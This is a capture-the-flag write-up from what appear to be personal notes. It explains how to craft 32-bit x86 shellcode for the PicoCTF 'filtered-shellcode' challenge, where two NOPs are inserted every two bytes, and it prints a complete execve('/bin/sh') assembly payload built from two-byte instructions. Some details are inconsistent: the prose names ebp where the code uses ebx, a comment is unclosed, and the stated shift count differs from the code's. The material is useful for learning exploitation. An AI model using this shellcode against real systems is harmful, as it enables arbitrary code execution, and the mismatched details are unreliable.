* asm tips for writing shellcode

  {https://defuse.ca/online-x86-assembler.htm#disassembly}[very useful assembler]

** (ref. PicoCTF/filtered-shellcode)

   *32-bit*

   In this challenge, your shellcode would be run under a filter: it would be broken up into byte pairs, inserting 2 nops
   every 2 bytes of shellcode. This means that conventional shellcodes wouldn't work, as they contain instructions longer
   than 2 bytes. Hence, we need to write our own shellcode. 

   The broad idea is just to execute a syscall with the following registers: 

   `eax=11, ebx=<pointer to /bin/sh>, ecx=0, edx=0`

   The first trick we have is `xor`. `xor ecx, ecx` will zero out the register in a single instruction which happens to
   be 2 bytes long. We want to do this for all our registers.

   The second trick is `ah/al`. `eax` is a 32-bit register like so:

   @code 
   00 -------------> eax
   00 -------------> eax
   00 -> ah -> ax -> eax
   00 -> al -> ax -> eax
   @end

   Using `ah/al`, we are able to modify part of `eax` byte by byte. (`ax` just refers to the lower 2 bytes of `eax`, or
   `ah/al` combined.)

   This is useful as `mov al, 11` is 2 bytes long, while `mov eax, 11` is 5 bytes long.

   The third trick is `shl ebx`. `ebx` is the most complicated register to control. Not only do we need to write the
   string to a location in memory and put the address in `ebx`, we also can't do it easily, since we can only write the
   bottom 2 bytes of each register. However, `shl ebx` will left-shift the contents of the register (or multiply by 2),
   so if we shift 8 times the contents of the register would be 1 byte shifted. 

   @code
   00 00 68 73 -> before
   00 68 73 00 -> after left-shifting 8 times
   @end

   Hence, we can use `ebx` to push `/sh\0` followed by `/bin` to the stack. 

   Lastly, `esp` points to the top of the stack. Since we just pushed `/bin` and `/sh\0` to the stack, `/bin/sh\0` would be
   at the top, and the address `esp` stores resolves to `/bin/sh`. We can simply `mov ebp, esp` to setup `ebp` for the
   syscall.

   Here is the full assembly:
   @code asm
   /* Zero out the register 8?
   xor eax, eax
   xor ebx, ebx
   xor ecx, ecx
   xor edx, edx

   /* eax = 11 */
   mov al, 11

   /* ebx = "sh\0" */
   mov bl, 0x68
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   mov bl, 0x2f
   mov bh, 0x73
   push ebx
   nop

   /* ebx = "/bin" */
   mov bl, 0x69
   mov bh, 0x6e
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   shl ebx
   mov bl, 0x2f
   mov bh, 0x62
   push ebx
   nop

   /* ebx = <pointer to /bin/sh> */
   mov ebx, esp

   int 0x80
   @end

*** Some notes:

    I tried just "sh\0" to shorten the payload, and it turns out `execve("sh", 0, 0)` isn't valid, probably because there's no env loaded in
    execve.

    Using `syscall` in this 32-bit challenge will result in SIGILL.
